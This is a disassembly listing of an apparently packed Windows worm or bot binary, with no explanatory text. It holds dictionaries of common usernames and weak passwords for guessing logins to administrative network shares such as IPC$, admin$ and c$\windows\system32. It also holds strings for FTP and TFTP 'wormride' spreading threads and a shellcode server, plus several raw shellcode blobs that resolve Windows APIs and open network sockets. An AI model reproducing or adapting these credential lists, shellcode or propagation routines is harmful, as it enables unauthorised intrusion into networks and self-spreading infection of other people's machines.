add [ebx+eax*8+41h], bl
add [ebx+eax*8+41h], dl
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dd offset aC ; "c$"
dd offset aD ; "d$"
; ---------------------------------------------------------------------------
fadd st(2), st
inc ecx
add al, dl
retn 41h
; ---------------------------------------------------------------------------
dd offset aDShared ; "d$\\shared"
; ---------------------------------------------------------------------------
mov eax, 0AC0041C2h
retn 41h
; ---------------------------------------------------------------------------
mov al, ds:8C0041C2h
retn 41h
; ---------------------------------------------------------------------------
dd offset aCWindowsSystem ; "c$\\windows\\system32"
; ---------------------------------------------------------------------------
push 600041C2h
retn 41h
; ---------------------------------------------------------------------------
xor dl, al
inc ecx
add [eax], ch
retn 41h
; ---------------------------------------------------------------------------
dd offset aIpc ; "IPC$"
dd 0
dd offset byte_41DF00
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
; ---------------------------------------------------------------------------
aam 0C4h
inc ecx
add al, cl
les eax, [ecx+0]
rol ah, 41h
add [eax-4BFFBE3Ch], bh
les eax, [ecx+0]
sbb al, 0C2h
inc ecx
add [eax], bl
retn 41h
; ---------------------------------------------------------------------------
adc al, 0C2h
inc ecx
add [eax], cl
retn 41h
; ---------------------------------------------------------------------------
cld
rol dword ptr [ecx+0], 0F4h
rol dword ptr [ecx+0], 0F0h
rol dword ptr [ecx+0], 0E4h
rol dword ptr [ecx+0], 0DCh
rol dword ptr [ecx+0], 0D8h
rol dword ptr [ecx+0], 0D4h
rol dword ptr [ecx+0], 0D0h
rol dword ptr [ecx+0], 0CCh
rol dword ptr [ecx+0], 0C8h
rol dword ptr [ecx+0], 0C0h
rol dword ptr [ecx+0], 0B8h
rol dword ptr [ecx+0], 0B0h
rol dword ptr [ecx+0], 0A8h
rol dword ptr [ecx+0], 9Ch
rol dword ptr [ecx+0], 90h
rol dword ptr [ecx+0], 84h
rol dword ptr [ecx+0], 7Ch
rol dword ptr [ecx+0], 70h
rol dword ptr [ecx+0], 68h
rol dword ptr [ecx+0], 60h
rol dword ptr [ecx+0], 50h
xchg eax, edx
inc ecx
add [eax-3Fh], bl
inc ecx
add [eax+44004198h], dl
xchg eax, edx
inc ecx
add [eax-3Fh], dl
inc ecx
add [eax-3Fh], cl
inc ecx
add [eax-3Fh], al
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], bh
inc ecx
add [eax+eax*8+41h], ch
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-40h], ah
inc ecx
add [eax-40h], bl
inc ecx
add [eax-40h], dl
inc ecx
add [eax-40h], cl
inc ecx
add al, dh
rol byte ptr [ecx+0], 88h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], al
inc ecx
add [eax], bh
rol byte ptr [ecx+0], 30h
rol byte ptr [ecx+0], 28h
rol byte ptr [ecx+0], 80h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax+eax*8], bl
inc ecx
add [eax+eax*8], cl
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [eax+eax*8], al
inc ecx
add al, bh
mov edi, 0BFE80041h
inc ecx
add [ebx+eax*8+41h], ah
add ah, dl
mov edi, 0BFD00041h
inc ecx
add ah, cl
mov edi, 0BFC40041h
inc ecx
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [eax-5BFFBE41h], dh
mov edi, 0C3540041h
inc ecx
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-67FFBE41h], ah
mov edi, 0BF940041h
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [edi+edi*4-407BFFBFh], cl
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
aWinpass db 'winpass',0
aBlank db 'blank',0
align 4
aXp_0 db 'xp',0
align 4
aNokia db 'nokia',0
align 10h
aHp db 'hp',0
align 4
aOrainstall db 'orainstall',0
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0
align 4
aDb1234 db 'db1234',0
align 4
aDb2 db 'db2',0
aDb1 db 'db1',0
aDatabasepasswo db 'databasepassword',0
align 4
aDatabasepass db 'databasepass',0
align 4
aDbpassword db 'dbpassword',0
align 4
aDbpass db 'dbpass',0
align 4
aDomainpassword db 'domainpassword',0
align 4
aDomainpass db 'domainpass',0
align 4
aHello db 'hello',0
align 10h
aHell db 'hell',0
align 4
aLove db 'love',0
align 10h
aMoney db 'money',0
align 4
aSlut db 'slut',0
align 10h
aBitch db 'bitch',0
align 4
aFuck db 'fuck',0
align 10h
aExchange db 'exchange',0
align 4
aLoginpass db 'loginpass',0
align 4
aLogin db 'login',0
align 10h
aQwe db 'qwe',0 ; DATA XREF: UPX1:0041BE4C�o
aZxc db 'zxc',0 ; DATA XREF: UPX1:0041BE48�o
aAsd db 'asd',0 ; DATA XREF: UPX1:0041BE44�o
aQaz db 'qaz',0 ; DATA XREF: UPX1:0041BE40�o
aWin2000 db 'win2000',0 ; DATA XREF: UPX1:0041BE3C�o
aWinnt db 'winnt',0 ; DATA XREF: UPX1:0041BE38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: UPX1:0041BE34�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: UPX1:0041BE30�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: UPX1:0041BE2C�o
align 4
aWindows db 'windows',0 ; DATA XREF: UPX1:0041BE28�o
aOeminstall db 'oeminstall',0 ; DATA XREF: UPX1:0041BE20�o
align 4
aOem db 'oem',0 ; DATA XREF: UPX1:0041BE18�o
aAccounting db 'accounting',0 ; DATA XREF: UPX1:0041BE08�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: UPX1:0041BE04�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: UPX1:0041BE00�o
aSex db 'sex',0 ; DATA XREF: UPX1:0041BDFC�o
aOutlook db 'outlook',0 ; DATA XREF: UPX1:0041BDEC�o
aMail db 'mail',0 ; DATA XREF: UPX1:0041BDE8�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: UPX1:0041BDE4�o
align 4
aTemp123 db 'temp123',0 ; DATA XREF: UPX1:0041BDE0�o
aTemp db 'temp',0 ; DATA XREF: UPX1:0041BDDC�o
align 4
aNull db 'null',0 ; DATA XREF: UPX1:0041BDD8�o
align 4
aDefault db 'default',0 ; DATA XREF: UPX1:0041BDC8�o
aChangeme db 'changeme',0 ; DATA XREF: UPX1:0041BDC4�o
align 4
aDemo db 'demo',0 ; DATA XREF: UPX1:0041BDB4�o
align 10h
aTest db 'test',0
align 4
a2005 db '2005',0
align 10h
a2004 db '2004',0
align 4
a2001 db '2001',0
align 10h
aSecret db 'secret',0
align 4
aPayday db 'payday',0
align 10h
aDeadline db 'deadline',0
align 4
aWork db 'work',0
align 4
a1234567890 db '1234567890',0
align 10h
a123456789 db '123456789',0
align 4
a12345678 db '12345678',0
align 4
a1234567 db '1234567',0
a123456 db '123456',0
align 4
a12345 db '12345',0
align 10h
a1234 db '1234',0
align 4
a123 db '123',0
a12 db '12',0
align 10h
a1:
unicode 0, <1>,0
a007 db '007',0
aPwd db 'pwd',0
aPass db 'pass',0
align 4
aPass1234 db 'pass1234',0
align 10h
aDba db 'dba',0
aPasswd db 'passwd',0
align 4
aPassword db 'password',0 ; DATA XREF: UPX1:0041D840�o
align 4
aPassword1 db 'password1',0
align 4
aAbc db 'abc',0
aAb db 'ab',0
align 4
aA_0:
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: UPX1:0041BD04�o
align 4
aPrint db 'print$',0
align 10h
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
aAdmin_0 db 'admin$',0
align 4
aAdminSystem32 db 'Admin$\system32',0
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: UPX1:0041BCF0�o
aCWinntSystem32 db 'c$\winnt\system32',0
align 10h
aCWindows db 'c$\windows',0
align 4
aCWinnt db 'c$\winnt',0
align 4
aEShared db 'e$\shared',0
align 4
aDShared db 'd$\shared',0 ; DATA XREF: UPX1:0041BCDC�o
align 10h
aCShared db 'c$\shared',0
align 4
aE db 'e$',0
align 10h
aD db 'd$',0 ; DATA XREF: UPX1:0041BCD0�o
align 4
aC db 'c$',0 ; DATA XREF: UPX1:0041BCCC�o
align 4
aStaff db 'staff',0 ; DATA XREF: UPX1:0041BCC4�o
; UPX1:0041BF7C�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: UPX1:0041BCC0�o
; UPX1:0041BF78�o
aOwner db 'owner',0
align 10h
aStudent db 'student',0 ; DATA XREF: UPX1:0041BCB8�o
; UPX1:0041BF70�o
aIntranet db 'intranet',0
align 4
aLan_0 db 'lan',0
aMain db 'main',0 ; DATA XREF: UPX0:00416ACA�o
; UPX0:00416AEC�o
align 10h
aOffice db 'office',0
align 4
aControl db 'control',0
aSiemens db 'siemens',0
aCompaq db 'compaq',0
align 10h
aDell db 'dell',0
align 4
aCisco db 'cisco',0
align 10h
aIbm db 'ibm',0
aOracle db 'oracle',0
align 4
aSql db 'sql',0
aSa db 'sa',0
align 4
aData db 'data',0
align 4
aAccess db 'access',0
align 4
aDatabase db 'database',0
align 10h
aDomain db 'domain',0
align 4
aGod db 'god',0
aBackup db 'backup',0
align 4
aTechnical db 'technical',0
align 10h
aMary db 'mary',0
align 4
aKatie db 'katie',0
align 10h
aKate db 'kate',0
align 4
aGeorge db 'george',0
align 10h
aEric db 'eric',0
align 4
aNone db 'none',0
align 10h
aGuest db 'guest',0
align 4
aChris db 'chris',0
align 10h
aIan db 'ian',0
aNeil db 'neil',0
align 4
aLee db 'lee',0
aBrian db 'brian',0
align 4
aSusan db 'susan',0
align 10h
aSue db 'sue',0 ; DATA XREF: UPX1:0041BC24�o
; UPX1:0041BE78�o
aSam db 'sam',0 ; DATA XREF: UPX1:0041BC20�o
; UPX1:0041BE74�o
aLuke db 'luke',0 ; DATA XREF: UPX1:0041BC1C�o
; UPX1:0041BE70�o
align 10h
aPeter db 'peter',0 ; DATA XREF: UPX1:0041BC18�o
; UPX1:0041BE6C�o
align 4
aJohn db 'john',0 ; DATA XREF: UPX1:0041BC14�o
; UPX1:0041BE68�o
align 10h
aMike db 'mike',0 ; DATA XREF: UPX1:0041BC10�o
; UPX1:0041BE64�o
align 4
aBill db 'bill',0 ; DATA XREF: UPX1:0041BC0C�o
; UPX1:0041BE60�o
align 10h
aFred db 'fred',0 ; DATA XREF: UPX1:0041BC08�o
; UPX1:0041BE5C�o
align 4
aJoe db 'joe',0 ; DATA XREF: UPX1:0041BC04�o
; UPX1:0041BE58�o
aJen db 'jen',0 ; DATA XREF: UPX1:0041BC00�o
; UPX1:0041BE54�o
aBob db 'bob',0 ; DATA XREF: UPX1:0041BBFC�o
; UPX1:0041BE50�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: UPX1:0041BBF8�o
; UPX1:0041BE24�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: UPX1:0041BBF4�o
; UPX1:0041BE1C�o
aUser db 'user',0 ; DATA XREF: UPX1:0041BBF0�o
; UPX1:0041BE14�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: UPX1:0041BBEC�o
; UPX1:0041BE10�o
align 4
aHome db 'home',0 ; DATA XREF: UPX1:0041BBE8�o
; UPX1:0041BE0C�o
align 4
aInternet db 'internet',0 ; DATA XREF: UPX1:0041BBE4�o
; UPX1:0041BDF8�o
align 10h
aWww db 'www',0 ; DATA XREF: UPX1:0041BBE0�o
; UPX1:0041BDF4�o
aWeb db 'web',0 ; DATA XREF: UPX1:0041BBDC�o
; UPX1:0041BDF0�o
aRoot db 'root',0 ; DATA XREF: UPX1:0041BBD8�o
; UPX1:0041BDD4�o
align 10h
aServer_0 db 'server',0 ; DATA XREF: UPX1:0041BBD4�o
; UPX1:0041BDD0�o
align 4
aLinux db 'linux',0 ; DATA XREF: UPX1:0041BBCC�o
; UPX1:0041BDC0�o
align 10h
aUnix db 'unix',0 ; DATA XREF: UPX1:0041BBC8�o
; UPX1:0041BDBC�o
align 4
aComputer db 'computer',0 ; DATA XREF: UPX1:0041BBC4�o
; UPX1:0041BDB8�o
align 4
aAdm db 'adm',0 ; DATA XREF: UPX1:0041BBC0�o
aAdmin db 'admin',0 ; DATA XREF: UPX1:0041BBBC�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: UPX1:0041BBB8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: UPX1:0041BBB4�o
aAdministrateur db 'administrateur',0 ; DATA XREF: UPX1:0041BBB0�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: UPX1:0041BBAC�o
; UPX1:0041BD14�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: UPX1:0041BBA8�o
; UPX1:0041BD10�o
align 4
a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B:loc_4119BA�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+843�o
dword_41C514 dd 74A60h align 10h
unk_41C520 db 2Dh ; - ; DATA XREF: sub_41113B+80D�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: sub_41113B+808�o
dword_41C54C dd 11A328h dd 2 dup(0)
dword_41C558 dd 20363232h, 0A0D2Dh ; sub_41113B+7AA�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: sub_41113B+6AF�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+5C7�o
; sub_41113B+751�o
dword_41C5DC dd 13CFA0h dd 2 dup(0)
dword_41C5E8 dd 20333132h, 0A0D7525h, 0dword_41C5F4 dd 160250h align 10h
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: sub_41113B+427�o
align 4
dword_41C614 dd 165620h align 10h
dword_41C620 dd 20353234h, 0A0D2Dhdword_41C628 dd 150BD8h dd 2 dup(0)
dword_41C634 dd 20303032h, 0A0D2Dh ; sub_41113B+4A6�o
dword_41C63C dd 0C4110h dd 2 dup(0)
dword_41C648 dd 20373532h, 20222F22h, 0A0D2Dhdword_41C654 dd 2B020h dd 0
dword_41C65C dd 20313132h, 0A0D2Dhdword_41C664 dd 0A6BE0h align 10h
dword_41C670 dd 20353132h, 0A0D2Dhdword_41C678 dd 162FA0h dd 2 dup(0)
dword_41C684 dd 20303332h, 0A0D2Dhdword_41C68C dd 151098h dd 2 dup(0)
dword_41C698 dd 20313333h, 0A0D2Dhdword_41C6A0 dd 0CC2A8h dd 2 dup(0)
dword_41C6AC dd 0A0D20h ; sub_41113B+115�o ...
dword_41C6B0 dd 20303232h, 0A0D2Dhdword_41C6B8 dd 303332h dword_41C6BC dd 53534150h, 0A0D3120h, 0dword_41C6C8 dd 313333h dword_41C6CC dd 52455355h, 0A0D3120h, 0dword_41C6D8 dd 303232h unk_41C6DC db 2Dh ; - ; DATA XREF: sub_411BBC+115�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_411BBC+6E�o
align 10h
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_411D68+36�o
dword_41C724 dd 4000500h, 7868746Bh, 0unk_41C730 db 2Dh ; - ; DATA XREF: sub_411DC5+5BD�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 10h
aWormride db 'wormride',0 ; DATA XREF: sub_411DC5+5B8�o
align 4
dword_41C76C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411DC5+367�o
aOctet db 'octet',0 ; DATA XREF: sub_411DC5+333�o
; sub_411DC5+345�o
align 4
unk_41C788 db 2Dh ; - ; DATA XREF: sub_411DC5+144�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_4123F6+2B�o
align 4
loc_41C7C8: ; DATA XREF: sub_4125DF+50�o
jmp short loc_41C7DF
; ---------------------------------------------------------------------------
loc_41C7CA: ; CODE XREF: UPX1:loc_41C7DF�p
mov ecx, 0
xor ecx, 0
pop esi
loc_41C7D6: ; CODE XREF: UPX1:0041C7DB�j
xor byte ptr [ecx+esi-1], 0
loop loc_41C7D6
jmp short near ptr dword_41C7E4
; ---------------------------------------------------------------------------
loc_41C7DF: ; CODE XREF: UPX1:loc_41C7C8�j
call loc_41C7CA
; ---------------------------------------------------------------------------
dword_41C7E4 dd 0 dword_41C7E8 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+CB�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C89C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+8C�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C964 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+36�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41CA18 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_412720+71�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41CB95 db 0E3h ; DATA XREF: sub_4125DF+CF�r
; sub_4125DF+E4�w
align 4
dword_41CB98 dd 4113E68Bh ; sub_4125DF+75�w
align 10h
off_41CBA0 dd offset dword_41CCF8 ; DATA XREF: sub_4127D0+77�r
dd offset nullsub_5
dd 0
dd offset dword_41CCD8
dd offset dword_41CCCC
align 8
dd offset dword_41CCAC
dd offset nullsub_166
dd 0
dd offset dword_41CC84
dd offset nullsub_167
align 10h
dd offset loc_41CC58
dd offset dword_41CC4C
dd 0
dd offset dword_41CC34
dd offset nullsub_168
align 8
dd offset loc_41CC0C
dd offset nullsub_169
dd 4 dup(0)
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_169. PRESS KEYPAD "+" TO EXPAND]
db 0DAh
dd 2 dup(0)
; ---------------------------------------------------------------------------
loc_41CC0C: ; DATA XREF: UPX1:0041CBE8�o
; UPX1:0041DB60�o
mov ah, [esi-42447F50h]
mov esp, 0C590B1ACh
cdq
icebp
mov edi, 0B191C99Ah
test dword ptr [esi+0A0ADh], 0
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_168. PRESS KEYPAD "+" TO EXPAND]
db 0D0h
dd 2 dup(0)
dword_41CC34 dd 91B0A391h, 0A1B1FABBh, 9EDF93AAh, 88DAB2E5h, 0B4AD9Ah
; DATA XREF: UPX1:0041CBDC�o
; UPX1:0041DB54�o
dd 0
dword_41CC4C dd 0DBEFF5CEh, 2 dup(0) ; UPX1:0041DB4C�o
; ---------------------------------------------------------------------------
loc_41CC58: ; DATA XREF: UPX1:0041CBD0�o
; UPX1:0041DB48�o
xchg eax, esp
mov ebx, 0FAA489A9h
mov eax, ds:0DA97B2BAh
retn 0A4A4h
; ---------------------------------------------------------------------------
dw 0D386h
dd 84B8B28Bh, 0E6BCA1A0h, 0DB99A1h, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_167. PRESS KEYPAD "+" TO EXPAND]
db 0F0h, 0E0h, 0DBh
dd 2 dup(0)
dword_41CC84 dd 87BEA397h, 0A9BAFAA7h, 9FC29FA5h, 0C381BEE5h, 0C6ACB590h
; DATA XREF: UPX1:0041CBC4�o
; UPX1:0041DB3C�o
dd 0A0B1A6h, 0
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_166. PRESS KEYPAD "+" TO EXPAND]
db 0D0h
dd 2 dup(0)
dword_41CCAC dd 8DBEAB8Eh, 0A4B6FABAh, 82DD95A3h, 0D581B2FEh, 9BBAA69Bh
; DATA XREF: UPX1:0041CBB8�o
; UPX1:0041DB30�o
dd 0A5BBB7E6h, 2 dup(0)
dword_41CCCC dd 0D0EBFBC0h, 2 dup(0) ; UPX1:0041DB28�o
dword_41CCD8 dd 0C6B0A38Dh, 0A0A7BCA1h, 0D88E92B1h, 84B8F4h, 0
; DATA XREF: UPX1:0041CBAC�o
; UPX1:0041DB24�o
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_5. PRESS KEYPAD "+" TO EXPAND]
db 0F0h, 0EAh, 0DCh
dd 2 dup(0)
dword_41CCF8 dd 90AAAB8Ah, 0A6B1B1BCh, 9EDF99ECh, 0C281A2F3h, 8DB7EC9Dh
; DATA XREF: UPX1:off_41CBA0�o
; UPX1:off_41DB18�o
dd 0BCh, 0
dword_41CD14 dd 72h dword_41CD18 dd 62h dword_41CD1C dd 63h dword_41CD20 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_412E04+64�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_41CD58 dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_412F07+98�o
dd 74726F70h, 34300320h, 3752502h, 2, 0
byte_41CD80 db 9Dh ; DATA XREF: sub_41294E+3C�o
; sub_41294E+4C�o ...
db 0A1h, 0B6h, 85h
dd 0FAh, 2 dup(0)
dd 0C8000000h, 0ECF1h, 3 dup(0)
db 2 dup(0)
dword_41CDA6 dd 8512DD9Ch ; sub_412FC6+31�r ...
dword_41CDAA dd 0 ; sub_414052+B5�r ...
off_41CDAE dd offset sub_410649 ; DATA XREF: sub_41294E+1C�r
; sub_412FC6+18�r ...
dw 3
dd 0
dd 0A7970000h, 0A0A998ADh, 0BCh, 2 dup(0)
dd 0ECF6CD00h, 4 dup(0)
dd 17B09A28h, 0
dd offset sub_410B52
dd 3, 10h dup(0)
